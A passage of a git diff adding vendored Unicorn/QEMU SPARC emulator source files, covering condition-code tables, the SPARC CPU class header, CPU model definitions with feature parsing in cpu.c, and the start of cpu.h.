uint32_t (*compute_c)(CPUSPARCState *env); /* return the C flag */ +} CCTable; + +static const CCTable icc_table[CC_OP_NB] = { + /* CC_OP_DYNAMIC should never happen */ + { compute_null, compute_null }, + { compute_all_flags, compute_C_flags }, + { compute_all_div, compute_C_div }, + { compute_all_add, compute_C_add }, + { compute_all_addx, compute_C_addx }, + { compute_all_tadd, compute_C_add }, + { compute_all_taddtv, compute_C_add }, + { compute_all_sub, compute_C_sub }, + { compute_all_subx, compute_C_subx }, + { compute_all_tsub, compute_C_sub }, + { compute_all_tsubtv, compute_C_sub }, + { compute_all_logic, compute_C_logic }, +}; + +#ifdef TARGET_SPARC64 +static const CCTable xcc_table[CC_OP_NB] = { + /* CC_OP_DYNAMIC should never happen */ + { compute_null, compute_null }, + { compute_all_flags_xcc, compute_C_flags_xcc }, + { compute_all_logic_xcc, compute_C_logic }, + { compute_all_add_xcc, compute_C_add_xcc }, + { compute_all_addx_xcc, compute_C_addx_xcc }, + { compute_all_add_xcc, compute_C_add_xcc }, + { compute_all_add_xcc, compute_C_add_xcc }, + { compute_all_sub_xcc, compute_C_sub_xcc }, + { compute_all_subx_xcc, compute_C_subx_xcc }, + { compute_all_sub_xcc, compute_C_sub_xcc }, + { compute_all_sub_xcc, compute_C_sub_xcc }, + { compute_all_logic_xcc, compute_C_logic }, +}; +#endif + +void helper_compute_psr(CPUSPARCState *env) +{ + uint32_t new_psr; + + new_psr = icc_table[CC_OP].compute_all(env); + env->psr = new_psr; +#ifdef TARGET_SPARC64 + new_psr = xcc_table[CC_OP].compute_all(env); + env->xcc = new_psr; +#endif + CC_OP = CC_OP_FLAGS; +} + +uint32_t helper_compute_C_icc(CPUSPARCState *env) +{ + uint32_t ret; + + ret = icc_table[CC_OP].compute_c(env) >> PSR_CARRY_SHIFT; + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu-qom.h new file mode 100644 index 0000000..6374fe8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu-qom.h @@ -0,0 +1,87 @@ +/* + * QEMU SPARC CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ +#ifndef QEMU_SPARC_CPU_QOM_H +#define QEMU_SPARC_CPU_QOM_H + +#include "qom/cpu.h" +#include "cpu.h" + +#ifdef TARGET_SPARC64 +#define TYPE_SPARC_CPU "sparc64-cpu" +#else +#define TYPE_SPARC_CPU "sparc-cpu" +#endif + +#define SPARC_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, SPARCCPUClass, (klass), TYPE_SPARC_CPU) +#define SPARC_CPU(uc, obj) ((SPARCCPU *)obj) +#define SPARC_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, SPARCCPUClass, (obj), TYPE_SPARC_CPU) + +/** + * SPARCCPUClass: + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * A SPARC CPU model. + */ +typedef struct SPARCCPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} SPARCCPUClass; + +/** + * SPARCCPU: + * @env: #CPUSPARCState + * + * A SPARC CPU. + */ +typedef struct SPARCCPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUSPARCState env; +} SPARCCPU; + +static inline SPARCCPU *sparc_env_get_cpu(CPUSPARCState *env) +{ + return container_of(env, SPARCCPU, env); +} + +#define ENV_GET_CPU(e) CPU(sparc_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(SPARCCPU, env) + +void sparc_cpu_do_interrupt(CPUState *cpu); +void sparc_cpu_dump_state(CPUState *cpu, FILE *f, + fprintf_function cpu_fprintf, int flags); +hwaddr sparc_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); +int sparc_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int sparc_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); +void QEMU_NORETURN sparc_cpu_do_unaligned_access(CPUState *cpu, + vaddr addr, int is_write, + int is_user, uintptr_t retaddr); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.c new file mode 100644 index 0000000..9c9c5ea --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.c @@ -0,0 +1,923 @@ +/* + * Sparc CPU init helpers + * + * Copyright (c) 2003-2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "hw/sparc/sparc.h" + +//#define DEBUG_FEATURES + +static int cpu_sparc_find_by_name(sparc_def_t *cpu_def, const char *cpu_model); + +/* CPUClass::reset() */ +static void sparc_cpu_reset(CPUState *s) +{ + SPARCCPU *cpu = SPARC_CPU(s->uc, s); + SPARCCPUClass *scc = SPARC_CPU_GET_CLASS(s->uc, cpu); + CPUSPARCState *env = &cpu->env; + + scc->parent_reset(s); + + memset(env, 0, offsetof(CPUSPARCState, version)); + tlb_flush(s, 1); + env->cwp = 0; +#ifndef TARGET_SPARC64 + env->wim = 1; +#endif + env->regwptr = env->regbase + (env->cwp * 16); + CC_OP = CC_OP_FLAGS; +#if defined(CONFIG_USER_ONLY) +#ifdef TARGET_SPARC64 + env->cleanwin = env->nwindows - 2; + env->cansave = env->nwindows - 2; + env->pstate = PS_RMO | PS_PEF | PS_IE; + env->asi = 0x82; /* Primary no-fault */ +#endif +#else +#if !defined(TARGET_SPARC64) + env->psret = 0; + env->psrs = 1; + env->psrps = 1; +#endif +#ifdef TARGET_SPARC64 + env->pstate = PS_PRIV|PS_RED|PS_PEF|PS_AG; + env->hpstate = cpu_has_hypervisor(env) ? HS_PRIV : 0; + env->tl = env->maxtl; + cpu_tsptr(env)->tt = TT_POWER_ON_RESET; + env->lsu = 0; +#else + env->mmuregs[0] &= ~(MMU_E | MMU_NF); + env->mmuregs[0] |= env->def->mmu_bm; +#endif + env->pc = 0; + env->npc = env->pc + 4; +#endif + env->cache_control = 0; +} + +static bool sparc_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + if (interrupt_request & CPU_INTERRUPT_HARD) { + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + + if (cpu_interrupts_enabled(env) && env->interrupt_index > 0) { + int pil = env->interrupt_index & 0xf; + int type = env->interrupt_index & 0xf0; + + if (type != TT_EXTINT || cpu_pil_allowed(env, pil)) { + cs->exception_index = env->interrupt_index; + sparc_cpu_do_interrupt(cs); + return true; + } + } + } + return false; +} + +static int cpu_sparc_register(struct uc_struct *uc, SPARCCPU *cpu, const char *cpu_model) +{ + CPUClass *cc = CPU_GET_CLASS(uc, cpu); + CPUSPARCState *env = &cpu->env; + char *s = g_strdup(cpu_model); + char *featurestr, *name = strtok(s, ","); + sparc_def_t def1, *def = &def1; + Error *err = NULL; + + if (cpu_sparc_find_by_name(def, name) < 0) { + g_free(s); + return -1; + } + + env->def = g_new0(sparc_def_t, 1); + memcpy(env->def, def, sizeof(*def)); + + featurestr = strtok(NULL, ","); + cc->parse_features(CPU(cpu), featurestr, &err); + g_free(s); + if (err) { + //error_report("%s", error_get_pretty(err)); + error_free(err); + return -1; + } + + env->version = def->iu_version; + env->fsr = def->fpu_version; + env->nwindows = def->nwindows; +#if !defined(TARGET_SPARC64) + env->mmuregs[0] |= def->mmu_version; + cpu_sparc_set_id(env, 0); + env->mxccregs[7] |= def->mxcc_version; +#else + env->mmu_version = def->mmu_version; + env->maxtl = def->maxtl; + env->version |= def->maxtl << 8; + env->version |= def->nwindows - 1; +#endif + return 0; +} + +SPARCCPU *cpu_sparc_init(struct uc_struct *uc, const char *cpu_model) +{ + SPARCCPU *cpu; + + cpu = SPARC_CPU(uc, object_new(uc, TYPE_SPARC_CPU)); + + if (cpu_sparc_register(uc, cpu, cpu_model) < 0) { + object_unref(uc, OBJECT(cpu)); + return NULL; + } + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", NULL); + + return cpu; +} + +void cpu_sparc_set_id(CPUSPARCState *env, unsigned int cpu) +{ +#if !defined(TARGET_SPARC64) + env->mxccregs[7] = ((cpu + 8) & 0xf) << 24; +#endif +} + +static const sparc_def_t sparc_defs[] = { +#ifdef TARGET_SPARC64 + { + "Fujitsu Sparc64", + ((0x04ULL << 48) | (0x02ULL << 32) | (0ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 4, + 4, + }, + { + "Fujitsu Sparc64 III", + ((0x04ULL << 48) | (0x03ULL << 32) | (0ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 5, + 4, + }, + { + "Fujitsu Sparc64 IV", + ((0x04ULL << 48) | (0x04ULL << 32) | (0ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Fujitsu Sparc64 V", + ((0x04ULL << 48) | (0x05ULL << 32) | (0x51ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "TI UltraSparc I", + ((0x17ULL << 48) | (0x10ULL << 32) | (0x40ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "TI UltraSparc II", + ((0x17ULL << 48) | (0x11ULL << 32) | (0x20ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "TI UltraSparc IIi", + ((0x17ULL << 48) | (0x12ULL << 32) | (0x91ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "TI UltraSparc IIe", + ((0x17ULL << 48) | (0x13ULL << 32) | (0x14ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc III", + ((0x3eULL << 48) | (0x14ULL << 32) | (0x34ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc III Cu", + ((0x3eULL << 48) | (0x15ULL << 32) | (0x41ULL << 24)), + 0x00000000, + mmu_us_3, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc IIIi", + ((0x3eULL << 48) | (0x16ULL << 32) | (0x34ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc IV", + ((0x3eULL << 48) | (0x18ULL << 32) | (0x31ULL << 24)), + 0x00000000, + mmu_us_4, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc IV+", + ((0x3eULL << 48) | (0x19ULL << 32) | (0x22ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_CMT, + 8, + 5, + }, + { + "Sun UltraSparc IIIi+", + ((0x3eULL << 48) | (0x22ULL << 32) | (0ULL << 24)), + 0x00000000, + mmu_us_3, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, + { + "Sun UltraSparc T1", + /* defined in sparc_ifu_fdp.v and ctu.h */ + ((0x3eULL << 48) | (0x23ULL << 32) | (0x02ULL << 24)), + 0x00000000, + mmu_sun4v, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_HYPV | CPU_FEATURE_CMT + | CPU_FEATURE_GL, + 8, + 6, + }, + { + "Sun UltraSparc T2", + /* defined in tlu_asi_ctl.v and n2_revid_cust.v */ + ((0x3eULL << 48) | (0x24ULL << 32) | (0x02ULL << 24)), + 0x00000000, + mmu_sun4v, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_HYPV | CPU_FEATURE_CMT + | CPU_FEATURE_GL, + 8, + 6, + }, + { + "NEC UltraSparc I", + ((0x22ULL << 48) | (0x10ULL << 32) | (0x40ULL << 24)), + 0x00000000, + mmu_us_12, + 0,0,0,0,0,0, + CPU_DEFAULT_FEATURES, + 8, + 5, + }, +#else + { + "Fujitsu MB86904", + 0x04 << 24, /* Impl 0, ver 4 */ + 4 << 17, /* FPU version 4 (Meiko) */ + 0x04 << 24, /* Impl 0, ver 4 */ + 0x00004000, + 0x00ffffc0, + 0x000000ff, + 0x00016fff, + 0x00ffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "Fujitsu MB86907", + 0x05 << 24, /* Impl 0, ver 5 */ + 4 << 17, /* FPU version 4 (Meiko) */ + 0x05 << 24, /* Impl 0, ver 5 */ + 0x00004000, + 0xffffffc0, + 0x000000ff, + 0x00016fff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI MicroSparc I", + 0x41000000, + 4 << 17, + 0x41000000, + 0x00004000, + 0x007ffff0, + 0x0000003f, + 0x00016fff, + 0x0000003f, + 0, + CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | CPU_FEATURE_MUL | + CPU_FEATURE_DIV | CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | + CPU_FEATURE_FMUL, + 7, + 0, + }, + { + "TI MicroSparc II", + 0x42000000, + 4 << 17, + 0x02000000, + 0x00004000, + 0x00ffffc0, + 0x000000ff, + 0x00016fff, + 0x00ffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI MicroSparc IIep", + 0x42000000, + 4 << 17, + 0x04000000, + 0x00004000, + 0x00ffffc0, + 0x000000ff, + 0x00016bff, + 0x00ffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 40", /* STP1020NPGA */ + 0x41000000, /* SuperSPARC 2.x */ + 0 << 17, + 0x00000800, /* SuperSPARC 2.x, no MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 50", /* STP1020PGA */ + 0x40000000, /* SuperSPARC 3.x */ + 0 << 17, + 0x01000800, /* SuperSPARC 3.x, no MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 51", + 0x40000000, /* SuperSPARC 3.x */ + 0 << 17, + 0x01000000, /* SuperSPARC 3.x, MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0x00000104, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 60", /* STP1020APGA */ + 0x40000000, /* SuperSPARC 3.x */ + 0 << 17, + 0x01000800, /* SuperSPARC 3.x, no MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 61", + 0x44000000, /* SuperSPARC 3.x */ + 0 << 17, + 0x01000000, /* SuperSPARC 3.x, MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0x00000104, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc II", + 0x40000000, /* SuperSPARC II 1.x */ + 0 << 17, + 0x08000000, /* SuperSPARC II 1.x, MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0x00000104, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "LEON2", + 0xf2000000, + 4 << 17, /* FPU version 4 (Meiko) */ + 0xf2000000, + 0x00004000, + 0x007ffff0, + 0x0000003f, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_TA0_SHUTDOWN, + 8, + 0, + }, + { + "LEON3", + 0xf3000000, + 4 << 17, /* FPU version 4 (Meiko) */ + 0xf3000000, + 0x00000000, + 0xfffffffc, + 0x000000ff, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_TA0_SHUTDOWN | + CPU_FEATURE_ASR17 | CPU_FEATURE_CACHE_CTRL | CPU_FEATURE_POWERDOWN | + CPU_FEATURE_CASA, + 8, + 0, + }, +#endif +}; + +static const char * const feature_name[] = { + "float", + "float128", + "swap", + "mul", + "div", + "flush", + "fsqrt", + "fmul", + "vis1", + "vis2", + "fsmuld", + "hypv", + "cmt", + "gl", +}; + +#if 0 +static void print_features(FILE *f, fprintf_function cpu_fprintf, + uint32_t features, const char *prefix) +{ + unsigned int i; + + for (i = 0; i < ARRAY_SIZE(feature_name); i++) { + if (feature_name[i] && (features & (1 << i))) { + if (prefix) { + (*cpu_fprintf)(f, "%s", prefix); + } + (*cpu_fprintf)(f, "%s ", feature_name[i]); + } + } +} +#endif + +static void add_flagname_to_bitmaps(const char *flagname, uint32_t *features) +{ + unsigned int i; + + for (i = 0; i < ARRAY_SIZE(feature_name); i++) { + if (feature_name[i] && !strcmp(flagname, feature_name[i])) { + *features |= 1 << i; + return; + } + } + //error_report("CPU feature %s not found", flagname); +} + +static int cpu_sparc_find_by_name(sparc_def_t *cpu_def, const char *name) +{ + unsigned int i; + const sparc_def_t *def = NULL; + + for (i = 0; i < ARRAY_SIZE(sparc_defs); i++) { + if (strcasecmp(name, sparc_defs[i].name) == 0) { + def = &sparc_defs[i]; + } + } + if (!def) { + return -1; + } + memcpy(cpu_def, def, sizeof(*def)); + return 0; +} + +static void sparc_cpu_parse_features(CPUState *cs, char *features, + Error **errp) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + sparc_def_t *cpu_def = cpu->env.def; + char *featurestr; + uint32_t plus_features = 0; + uint32_t minus_features = 0; + uint64_t iu_version; + uint32_t fpu_version, mmu_version, nwindows; + + featurestr = features ? strtok(features, ",") : NULL; + while (featurestr) { + char *val; + + if (featurestr[0] == '+') { + add_flagname_to_bitmaps(featurestr + 1, &plus_features); + } else if (featurestr[0] == '-') { + add_flagname_to_bitmaps(featurestr + 1, &minus_features); + } else if ((val = strchr(featurestr, '='))) { + *val = 0; val++; + if (!strcmp(featurestr, "iu_version")) { + char *err; + + iu_version = strtoll(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + cpu_def->iu_version = iu_version; +#ifdef DEBUG_FEATURES + fprintf(stderr, "iu_version %" PRIx64 "\n", iu_version); +#endif + } else if (!strcmp(featurestr, "fpu_version")) { + char *err; + + fpu_version = strtol(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + cpu_def->fpu_version = fpu_version; +#ifdef DEBUG_FEATURES + fprintf(stderr, "fpu_version %x\n", fpu_version); +#endif + } else if (!strcmp(featurestr, "mmu_version")) { + char *err; + + mmu_version = strtol(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + cpu_def->mmu_version = mmu_version; +#ifdef DEBUG_FEATURES + fprintf(stderr, "mmu_version %x\n", mmu_version); +#endif + } else if (!strcmp(featurestr, "nwindows")) { + char *err; + + nwindows = strtol(val, &err, 0); + if (!*val || *err || nwindows > MAX_NWINDOWS || + nwindows < MIN_NWINDOWS) { + error_setg(errp, "bad numerical value %s", val); + return; + } + cpu_def->nwindows = nwindows; +#ifdef DEBUG_FEATURES + fprintf(stderr, "nwindows %d\n", nwindows); +#endif + } else { + error_setg(errp, "unrecognized feature %s", featurestr); + return; + } + } else { + error_setg(errp, "feature string `%s' not in format " + "(+feature|-feature|feature=xyz)", featurestr); + return; + } + featurestr = strtok(NULL, ","); + } + cpu_def->features |= plus_features; + cpu_def->features &= ~minus_features; +#ifdef DEBUG_FEATURES + print_features(stderr, fprintf, cpu_def->features, NULL); +#endif +} + +#if 0 +void sparc_cpu_list(FILE *f, fprintf_function cpu_fprintf) +{ + unsigned int i; + + for (i = 0; i < ARRAY_SIZE(sparc_defs); i++) { + (*cpu_fprintf)(f, "Sparc %16s IU " TARGET_FMT_lx + " FPU %08x MMU %08x NWINS %d ", + sparc_defs[i].name, + sparc_defs[i].iu_version, + sparc_defs[i].fpu_version, + sparc_defs[i].mmu_version, + sparc_defs[i].nwindows); + print_features(f, cpu_fprintf, CPU_DEFAULT_FEATURES & + ~sparc_defs[i].features, "-"); + print_features(f, cpu_fprintf, ~CPU_DEFAULT_FEATURES & + sparc_defs[i].features, "+"); + (*cpu_fprintf)(f, "\n"); + } + (*cpu_fprintf)(f, "Default CPU feature flags (use '-' to remove): "); + print_features(f, cpu_fprintf, CPU_DEFAULT_FEATURES, NULL); + (*cpu_fprintf)(f, "\n"); + (*cpu_fprintf)(f, "Available CPU feature flags (use '+' to add): "); + print_features(f, cpu_fprintf, ~CPU_DEFAULT_FEATURES, NULL); + (*cpu_fprintf)(f, "\n"); + (*cpu_fprintf)(f, "Numerical features (use '=' to set): iu_version " + "fpu_version mmu_version nwindows\n"); +} + +static void cpu_print_cc(FILE *f, fprintf_function cpu_fprintf, + uint32_t cc) +{ + cpu_fprintf(f, "%c%c%c%c", cc & PSR_NEG ? 'N' : '-', + cc & PSR_ZERO ? 'Z' : '-', cc & PSR_OVF ? 'V' : '-', + cc & PSR_CARRY ? 'C' : '-'); +} + +#ifdef TARGET_SPARC64 +#define REGS_PER_LINE 4 +#else +#define REGS_PER_LINE 8 +#endif + +void sparc_cpu_dump_state(CPUState *cs, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + SPARCCPU *cpu = SPARC_CPU(cs); + CPUSPARCState *env = &cpu->env; + int i, x; + + cpu_fprintf(f, "pc: " TARGET_FMT_lx " npc: " TARGET_FMT_lx "\n", env->pc, + env->npc); + + for (i = 0; i < 8; i++) { + if (i % REGS_PER_LINE == 0) { + cpu_fprintf(f, "%%g%d-%d:", i, i + REGS_PER_LINE - 1); + } + cpu_fprintf(f, " " TARGET_FMT_lx, env->gregs[i]); + if (i % REGS_PER_LINE == REGS_PER_LINE - 1) { + cpu_fprintf(f, "\n"); + } + } + for (x = 0; x < 3; x++) { + for (i = 0; i < 8; i++) { + if (i % REGS_PER_LINE == 0) { + cpu_fprintf(f, "%%%c%d-%d: ", + x == 0 ? 'o' : (x == 1 ? 'l' : 'i'), + i, i + REGS_PER_LINE - 1); + } + cpu_fprintf(f, TARGET_FMT_lx " ", env->regwptr[i + x * 8]); + if (i % REGS_PER_LINE == REGS_PER_LINE - 1) { + cpu_fprintf(f, "\n"); + } + } + } + + for (i = 0; i < TARGET_DPREGS; i++) { + if ((i & 3) == 0) { + cpu_fprintf(f, "%%f%02d: ", i * 2); + } + cpu_fprintf(f, " %016" PRIx64, env->fpr[i].ll); + if ((i & 3) == 3) { + cpu_fprintf(f, "\n"); + } + } +#ifdef TARGET_SPARC64 + cpu_fprintf(f, "pstate: %08x ccr: %02x (icc: ", env->pstate, + (unsigned)cpu_get_ccr(env)); + cpu_print_cc(f, cpu_fprintf, cpu_get_ccr(env) << PSR_CARRY_SHIFT); + cpu_fprintf(f, " xcc: "); + cpu_print_cc(f, cpu_fprintf, cpu_get_ccr(env) << (PSR_CARRY_SHIFT - 4)); + cpu_fprintf(f, ") asi: %02x tl: %d pil: %x\n", env->asi, env->tl, + env->psrpil); + cpu_fprintf(f, "cansave: %d canrestore: %d otherwin: %d wstate: %d " + "cleanwin: %d cwp: %d\n", + env->cansave, env->canrestore, env->otherwin, env->wstate, + env->cleanwin, env->nwindows - 1 - env->cwp); + cpu_fprintf(f, "fsr: " TARGET_FMT_lx " y: " TARGET_FMT_lx " fprs: " + TARGET_FMT_lx "\n", env->fsr, env->y, env->fprs); +#else + cpu_fprintf(f, "psr: %08x (icc: ", cpu_get_psr(env)); + cpu_print_cc(f, cpu_fprintf, cpu_get_psr(env)); + cpu_fprintf(f, " SPE: %c%c%c) wim: %08x\n", env->psrs ? 'S' : '-', + env->psrps ? 'P' : '-', env->psret ? 'E' : '-', + env->wim); + cpu_fprintf(f, "fsr: " TARGET_FMT_lx " y: " TARGET_FMT_lx "\n", + env->fsr, env->y); +#endif + cpu_fprintf(f, "\n"); +} +#endif + +static void sparc_cpu_set_pc(CPUState *cs, vaddr value) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + + cpu->env.pc = value; + cpu->env.npc = value + 4; +} + +static void sparc_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + + cpu->env.pc = tb->pc; + cpu->env.npc = tb->cs_base; +} + +static bool sparc_cpu_has_work(CPUState *cs) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + CPUSPARCState *env = &cpu->env; + + return (cs->interrupt_request & CPU_INTERRUPT_HARD) && + cpu_interrupts_enabled(env); +} + +static int sparc_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp) +{ + SPARCCPUClass *scc = SPARC_CPU_GET_CLASS(uc, dev); +#if defined(CONFIG_USER_ONLY) + SPARCCPU *cpu = SPARC_CPU(uc, dev); + CPUSPARCState *env = &cpu->env; + + if ((env->def->features & CPU_FEATURE_FLOAT)) { + env->def->features |= CPU_FEATURE_FLOAT128; + } +#endif + + qemu_init_vcpu(CPU(dev)); + + scc->parent_realize(uc, dev, errp); + + return 0; +} + +static void sparc_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + CPUState *cs = CPU(obj); + SPARCCPU *cpu = SPARC_CPU(uc, obj); + CPUSPARCState *env = &cpu->env; + + cs->env_ptr = env; + cpu_exec_init(env, opaque); + + if (tcg_enabled(uc)) { + gen_intermediate_code_init(env); + } +} + +static void sparc_cpu_uninitfn(struct uc_struct *uc, Object *obj, void *opaque) +{ + SPARCCPU *cpu = SPARC_CPU(uc, obj); + CPUSPARCState *env = &cpu->env; + + g_free(env->def); +} + +static void sparc_cpu_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + SPARCCPUClass *scc = SPARC_CPU_CLASS(uc, oc); + CPUClass *cc = CPU_CLASS(uc, oc); + DeviceClass *dc = DEVICE_CLASS(uc, oc); + + scc->parent_realize = dc->realize; + dc->realize = sparc_cpu_realizefn; + + scc->parent_reset = cc->reset; + cc->reset = sparc_cpu_reset; + + cc->parse_features = sparc_cpu_parse_features; + cc->has_work = sparc_cpu_has_work; + cc->do_interrupt = sparc_cpu_do_interrupt; + cc->cpu_exec_interrupt = sparc_cpu_exec_interrupt; + //cc->dump_state = sparc_cpu_dump_state; +#if !defined(TARGET_SPARC64) && !defined(CONFIG_USER_ONLY) + cc->memory_rw_debug = sparc_cpu_memory_rw_debug; +#endif + cc->set_pc = sparc_cpu_set_pc; + cc->synchronize_from_tb = sparc_cpu_synchronize_from_tb; +#ifdef CONFIG_USER_ONLY + cc->handle_mmu_fault = sparc_cpu_handle_mmu_fault; +#else + cc->do_unassigned_access = sparc_cpu_unassigned_access; + cc->do_unaligned_access = sparc_cpu_do_unaligned_access; + cc->get_phys_page_debug = sparc_cpu_get_phys_page_debug; +#endif +} + +void sparc_cpu_register_types(void *opaque) +{ + const TypeInfo sparc_cpu_type_info = { + TYPE_SPARC_CPU, + TYPE_CPU, + + sizeof(SPARCCPUClass), + sizeof(SPARCCPU), + opaque, + + sparc_cpu_initfn, + NULL, + sparc_cpu_uninitfn, + + NULL, + + sparc_cpu_class_init, + NULL, + NULL, + + false, + }; + + //printf(">>> sparc_cpu_register_types\n"); + type_register_static(opaque, &sparc_cpu_type_info); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.h new file mode 100644 index 0000000..2f8ed15 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-sparc/cpu.h @@ -0,0 +1,759 @@ +#ifndef CPU_SPARC_H +#define CPU_SPARC_H + +#include "config.h" +#include "qemu-common.h" +#include "qemu/bswap.h" + +#define ALIGNED_ONLY + +#if !defined(TARGET_SPARC64) +#define TARGET_LONG_BITS 32 +#define TARGET_DPREGS 16 +#define TARGET_PAGE_BITS 12 /* 4k */ +#define TARGET_PHYS_ADDR_SPACE_BITS 36 +#define TARGET_VIRT_ADDR_SPACE_BITS 32 +#else +#define TARGET_LONG_BITS 64 +#define TARGET_DPREGS 32 +#define 